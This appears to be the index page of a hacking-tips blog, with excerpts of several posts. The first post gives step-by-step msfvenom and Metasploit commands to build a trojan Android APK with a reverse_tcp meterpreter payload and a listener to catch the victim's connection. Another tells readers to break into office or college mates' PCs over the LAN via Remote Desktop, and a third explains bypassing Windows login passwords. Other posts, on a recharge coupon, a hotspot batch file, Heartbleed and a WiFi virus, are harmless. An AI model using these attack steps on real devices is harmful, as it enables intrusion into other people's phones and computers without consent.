Posts

How to hack mobile in wifi?

Procedure: Step 1: Fire-Up Kali: ·          Open a terminal, and make a  Trojan  .apk ·          we can do this by typing : msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R > FILENAME.apk •   -p =>   Specify Payload •   LHOST =>   Your  IP or DDNS •   LPORT =>   Port You want to listen on •   R =>   Means RAW Format •   >/root/FILENAME.apk =>   Location for File Step 2: Open Another Terminal: ·          Open another terminal until the file is being produced. ·          Load metasploit console, by typing :  msfconsole Step 3: Set-Up a Listener: ·          After it loads, load the multi-handler exploit by typing :  use exploit/multi/handler ·          Set up a (reverse) payload by typing :  set payload android/meterpreter/reverse_tcp ·          To set L host type :  set LHOST 192.168.0.4  (Even if you are hacking on WAN type your private/internal IP here

Free Rs.50 recharge trick march 2015

 Here is the Best recharge Freebie for the day. You just need to install Times of India Mobile app and you will get Rs. 50 Paytm Voucher valid on mobile recharge. Follow the below steps to avail this offer : 1. Download (links are given below)the Times of India Application. 2.Just install times of India application and login with facebook id and get paytm Rs 50 Recharge Voucher. 3.You can redeem this coupon only on the Paytm app. 4.Download the paytm app 5.Go to ‘Offers’ under ‘settings’ in Times of India app and check the code. TOI app:- https://play.google.com/store/apps/details?id=com.toi.reader.activities Paytm app:- https://play.google.com/store/apps/details?id=net.one97.paytm Terms and conditions: -This code will expire on 31/03/2015 -Recharge can be done on same mobile no. from which you have registered your paytm account. -Your facebook account account should be minimum 90 days old. -In your friend list there should be minimum 10 friends. -Offer can be used

How to start a hotspot on pc without any software?

How to Start Wi-Fi Hotspot using Notepad STEP 1 :  Press  "window key + R " and type "notepad" STEP 2 :  Now it will open Notepad, Just copy below code and paste it. netsh wlan set hostednetwork mode=allow ssid=WIFIHOTSPOTNAME key=PASSWORD netsh wlan start hostednetwork NOTE :-  Replace WIFIHOTSPOTNAME with your name and PASSWORD with your own password which you feel will be secured. STEP 3 :  Save this file as WIFIHOTSPOT.bat  (Make sure your extension is .bat)

How to unlock any windows pc?

Image
Hey guys! I'll tell you how to unlock any computer by using pcunlocker live boot USB/CD.. This process may take just some 10 to 15 mins of your time. Whether you forgot Windows login password or your administrator account got locked out or disabled accidentally, there is a simple way to unlock your computer without a password. Here we'll get you through the process of unlocking any password protected computer with PCUnlocker Live CD/USB How to Unlock Any Computer without A Password? Step #1: First, you are required to create a PCUnlocker Live CD/USB from another computer that you have access to. This can be your work PC, or a friend or family member's PC (any PC within your reach). Download the ISO image of PCUnlocker and burn it to a blank CD or DVD using ISO2Disc program. If you don't have a CD burner, A USB flash drive can also be used to make a bootable PCUnlocker USB drive. Step #2: Next thing is, insert the PCUnlocker Live CD into your own machine and boot th

What actually is HEARTBLEED?

  One of the biggest stories making rounds from the past few days is the discovery of the Heartbeed bug. This bug was discovered by a Finnish security firm called Codenomicon and an independent Google researcher, who came to know that one of the most widely used online security protocols was not as safe as it was thought to be. As a result, it is possible that millions of bank transactions, credit card numbers, passwords and other supposedly secure information could have been accessed by hackers. This flaw in online security has been undetected since more than 2 years, and it is unknown whether hackers have found out about it. Here’s more about the Heartbleed bug, who’s affected and what you can do about it. From a consumer point of view, any website that uses the vulnerable versions of OpenSSL are open to attack, and these websites can only protect themselves and their users by upgrading to the latest version that squashes the bug. However, in the two years that the flaw went undete

Ever heard about a virus that spreads like common cold ??

The past few days there's been a lot of buzz about a virus called Chameleon with spreads like common cold, between Wireless Access Points . Chameleon is the product of the University of Liverpool’s School of Computer Science and Electrical Engineering and Electronics and shows for the first time that WiFi networks can be infected with a virus that moves through the air, jumping from access point to access point. WiFi access points have long been known to be potentially weak spots onto networks, often left unprotected by passwords or encryption, or still using the manufacturer’s or telecoms operator’s default security codes. But up until now, there hasn’t been a virus that could attack a WiFi network. Chameleon behaves just as a disease would in a viral outbreak, moving faster through cities with dense populations, where access points (and humans) are closer together. The computer scientists simulated its outbreak in Belfast and London and found that in the higher density of Lond

Hacking computers in same LAN ?

IF you are working in Office / Colleges and want to hack your friends & college mate PC then here is a trick . First Step press win+ R Go to Run> Type Cmd now type command net view It will be look as below C:\>net view Server Name Remark ----------------------------------------------- \\xyz \\abc Here you can get all the names of all the computers machine names which connect with your LAN. Now you got the name. Lets start hacking into the systems. After you get server name now type tracert command for knowing IP of the victim machine. Example: C:\> tracert xyz Here you get the IP address of the XYZ computer machine. Now go to windows start button and type Remote Desktop Connection After click on Remote Desktop Connection you get below image.. Now type the IP address or computer name of victim machine. Click on Connect <-| It will also ask administrator password which is common as usual you known about. After few second Victim machine shown